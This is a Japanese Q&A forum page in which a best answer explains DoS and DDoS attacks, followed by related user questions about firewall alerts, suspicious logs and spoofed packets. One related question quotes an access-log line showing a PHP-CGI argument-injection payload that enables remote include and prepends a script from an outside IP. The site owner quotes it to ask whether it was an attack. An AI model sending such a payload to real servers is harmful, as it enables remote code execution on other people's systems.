- ベストアンサー
なぜ攻撃できるのですか?
popesyuの回答
- popesyu
- ベストアンサー率36% (1782/4883)
既に回答が出ていますが 要求=攻撃です。 例えば、普通に掲示板に書き込みをすることは簡単に出来ます。でこれを連続して行えば連続書き込みになりますよね。するとアラシとか呼ばれたりします。 ま最近は普通にPINGを複数打つだけでは攻撃にはならないんですけども。対策もされてますので。上記の掲示板の例でも相手が個人であればそれなりに対策できます。 そのためDDoS攻撃と呼ばれるように複数のパソコンから同時に同一のターゲットにアタックするというのが最近の主流です(イメージ的にはコンサートチケットの予約時の電話回線でも想像して下さい)。しかもこれはタチの悪いことに攻撃している人にその自覚がないことです。 セキュリティが無防備なサーバーなどを乗っ取り、乗っ取られたパソコンがまた別のサーバーを乗っ取り、ねずみ算式に増えていったパソコンが同じターゲットに要求を出すというものです。 これには今のところ対抗策はありません。サーバー管理者が普通のセキュリティ対策をすれば十分なんですが、そういうことを言い出すと、全ての人が交通法規を守れば、交通事故はこの世からなくなりますもんね。
noname#3479
関連するQ&A
- 攻撃されているログの見方
初めまして。ネットワーク管理初心者のものです。 最近あるIPアドレスから頻繁にアクセスがあります。 プロトコルはUDPで、送信先が161です。 UDPの161とは、snmpだと調べましたが、このツールがなんなのか、 一体何をしに、何のために自分へアクセスしているのかがわかりません。 ただ、毎日かなりの回数のアクセスログがあり、気になってはいます。 自分のパソコンは誰かから攻撃されているのでしょうか? 全然知識がないため、ただログを見ていることしかできません。 どなたか詳しい方、教えて下さい。
- ベストアンサー
- ネットワーク
- 攻撃者が自分!?
最近トロイの木馬に攻撃されたのですが、攻撃者のIPアドレスをみると自分のIPアドレスなのです・・これは偽造なんでしょうか?専門の人に診断していただく予定なのですが、どうしても気になってそれまで待てません。どうぞよろしくお願い致します。
- 締切済み
- ウィルス・マルウェア
- 攻撃を受けた場合どうしていますか?
ノートンのインターネットセキュリティを使っている者なのですが、最近、攻撃が激しく、ほぼ毎日のように警告表示が出ます。(以前は月1回位有るか無いかだったんですが・・・) ノートンのログを見ると、相手のIPアドレスと攻撃ツール等が書いてあるのですが、このログを何処かの調査機関に提出するなど、対応することは出来るでしょうか。
- ベストアンサー
- ネットワーク
- まだしつこく攻撃してくるのですが・・・
前投稿したのですが、まだしつこくハッカーが攻撃してきます。マカフィーで全部ブロックされているのですが、ブロックされれば個人情報とかは漏れることはないのですか? 前PCゲームで通信対戦ができないため、IPとかをいじくっていて、そのときにファイヤーウォールとかも一端全部切ってしまったのですが・・・。 ポートの開放やIPアドレスを固定したのも何か関係があるのですか?詳しい方よろしくお願いします。
- ベストアンサー
- スパイウェア
- これってサイバー攻撃でしょうか?
私が運営するWebサイト(www.example.comとします)に、以下のようなアクセスログが残っていました。 www.example.com/?-dsafe_mode=Off -ddisable_functions=NULL -dallow_url_fopen=On -dallow_url_include=On -dauto_prepend_file=http://61.19.253.26/echo.txt 最後のIPアドレス「61.19.253.26」を調べると、タイ国のもののようですが、使用されていないようです。 これってサイバー攻撃の一種なのでしょうか? 何かしらの情報が盗まれたりした痕跡なのでしょうか? 自分で、ブラウザに上記URLを打ち込んだのですが、反応がありませんでした。 ちなみに、私のサイトはレンタルの共有サーバーで運用しています。 また、全てPHPで作成しており、ルートのindex.phpにパラメータを与えることで、全てのページを表示させるようにしています。 なお、index.phpとcssや画像以外は非公開ディレクトリに置いています。 また、同一契約で上記と同じ公開ディレクトリに複数のWebサイトを作っています。 盗まれたものは取り返せないので仕方がないのですが、危険な攻撃であればセキュリティを高める手段を講じる必要があると感じています。 上記アクセスで何が行われたのか、どのような危険があるのか、ご存じの方がいらっしゃいましたらご教授いただければ幸いです。 よろしくお願いいたします。
- ベストアンサー
- ネットワーク
- 同じ攻撃を毎日受けます…
McAfeeのFirewallを使っています。 先日から、192.168.0.7にあるコンピュータからまったく同じ攻撃を4度も受けているようです。 幸い、Firewallが作動し被害は出ていないようですが、毎日同じ攻撃されるので気持ち悪く感じています。 放っておいて大丈夫でしょうか? もし、何かやっておくべき対策がありましたらご教授下さい。 (なお、パソコンはメール・ワード資料作成・インターネット接続にしか使っていません。) ************************************ IP アドレス 192.168.0.7 にあるコンピュータが、ユーザのコンピュータ上の UDP ポート 137 に対して要求されていない接続を試みました。 UDP ポート 137 は、通常は "NETBIOS Name" サービスまたはプログラムによって使用されます。
- ベストアンサー
- ウィルス・マルウェア
- 別のPCから攻撃を受ける、とはどういう意味でしょうか?
PCにはノートンが入っていますが、 「別のPCから攻撃を受けたので機能を 一時的にカットします」、といったような メッセージがあり、レポートを表示すると IPアドレスと発信場所と思われる所が表示されました。 この「攻撃」を受けるとはどういう意味なのか、 またノートンは「攻撃の起点と思われるドメインまたはネットワークの、PCの位置を含む情報を発見しました。」とデータを表示しますがデータの見方がわかりません。 ノートンはこれに対し対策はいらないようなことを 表示しますが実際どうでしょうか。 どなたかわかる方回答お願いします。
- ベストアンサー
- ウィルス・マルウェア
- 攻撃者にターゲッティングされた場合…
Twitterやブログによくある短縮URL先のウェブページに埋め込まれた攻撃コードによって、PCが半ば乗っ取られた後について質問します。 1.何か仕込まれていると思い、プロバイダの変更手続きを行ってからPCとルータをリストア・リセットし、書類が届いてから新規にセットアップをするが、IPアドレスの枯渇によってプロバイダにぶら下がっている世帯PCのIPアドレスは変わらないと言ってもいいぐらいなので、「この住所、このプロバイダなら、ここのIPアドレスの範囲に繋がるはず。書類到着日を予想して空いているIPアドレスを定期ノックして反応があれば、即座にアタックを仕掛け」て成功させる事は可能でしょうか? 2.(pingとかになるのでしょうか)ノックをした際の返事の具合で、何のルータを使って接続しているか特定は可能でしょうか? 地元の、またはDTIのプロバイダから配布されているIPアドレスがONU・ルータの電源を24時間切っていても変更されることが無かったため、プロバイダを乗り換えた事があるのですが…やりすぎでしょうか?考えすぎだとは思いますが、もしネット経由で攻撃者に付きまとわれた場合、どんな対策を練って、そして実行するのがベストなのか教えてほしいです。
- ベストアンサー
- ネットワーク
- [Error][アラームログ] DoS攻撃
HG8045QにNetgearのルーターをブリッジーモードで接続しています。接続機器が多いのと、HG8045Qの設置場所から離れた2階で有線接続する必要もあるためです。(ちなみに、HG8045Qの接続場所は、設置業者の人から「ここしかないですね」と言われてしまったので不本意ながら1階になっています) ある日、HG8045Qの[ログ]を見てみると、以下のようなエラーが記録されていました。 [Error][アラームログ] アラームID:303500,アラームレベル:エラー,DoS攻撃 種別:smurf 送信元IPアドレス:***.***.***.*** 宛先IPアドレス:255.255.255.255 送信元MACアドレス:10-0c-6b-ec-27-5a これは、毎日ほぼ同時刻に1回記録されています。 気味が悪いので、[送信元MACアドレス:10-0c-6b-ec-27-5a]このMACアドレスが誰のものかを、https://uic.jp/mac/ で調べました。 結果、[Vendor name: NETGEAR]とのこと。 つまり、HG8045Qにブリッジーモードで接続したルーターから、毎日1回、DoS攻撃と判断されるアクセスが行われているということです。 ここで質問なのですが、以上のことから、 1)Netgearから[DoS攻撃]を受けている。 2)Netgearのルーター経由で、誰かから[DoS攻撃]を受けている。 3)何らかの信号はあるものの、攻撃では無く、HG8045Qの勘違い。 4)その他 どれに該当するでしょうか。 情報が少なくてすみません。現状わかる範囲のことは記載致しました。 他に確認すべきこと、その方法などがありましたらそれもご教示願えますと幸いです。 以上、宜しくお願い致します。 ※OKWAVEより補足:「So-netの各種設定」についての質問です。
- ベストアンサー
- Wi-Fi・無線LAN
- インターネット通信不能攻撃への対策
ネットにつなぐ時もし攻撃者が僕が毎日10:00にモデムに電源をいれ プロバイダーからIPアドレスを振ってもらうタイミングがわかるとします。そして時々僕のところに除きに来て通信先もわかるとして、そこからIPアドレスをパケットを盗聴して僕のIPアドレスは完全に特定できるとして、IPアドレスの変更は無駄なこととして聞いてください。 僕のIPアドレスがばれているので通信先がわかり訪れたサイトのIPアドレスに成りすましTCPパケットを連続で打ってきます。 これはパーソナルファイアウォールのTCPのインバウンド拒否で防げますが、迷惑なのが 通信できないようにしてくることです。 僕のIPアドレスに成りすましてFIN、RSTパケットを送って通信を終わらせてるのか 通信先のIPアドレスに成りすまして僕のほうにFIN、RSTパケットを送ってきて終わらせてるのか そういうの詳しくないんですけど そういうのができると本気を出せば一日中強制的に通信不能にできることもできますよね? IPアドレスが偽装されてるのでどう相手を特定したらいいんですか? またjeticoというPFWがありますがこれはTCPのFIN,SYN,RSTなどフラグ別にまで制御できますが、これでインバウンドのRST,FINを遮断すれば解決できませんか?(それではぼくのIPアドレスに偽装して通信先にFIN、RSTパケットを送る遮断攻撃対策になってませんが) どうすれば遮断攻撃を回避できますか?
- 締切済み
- スパイウェア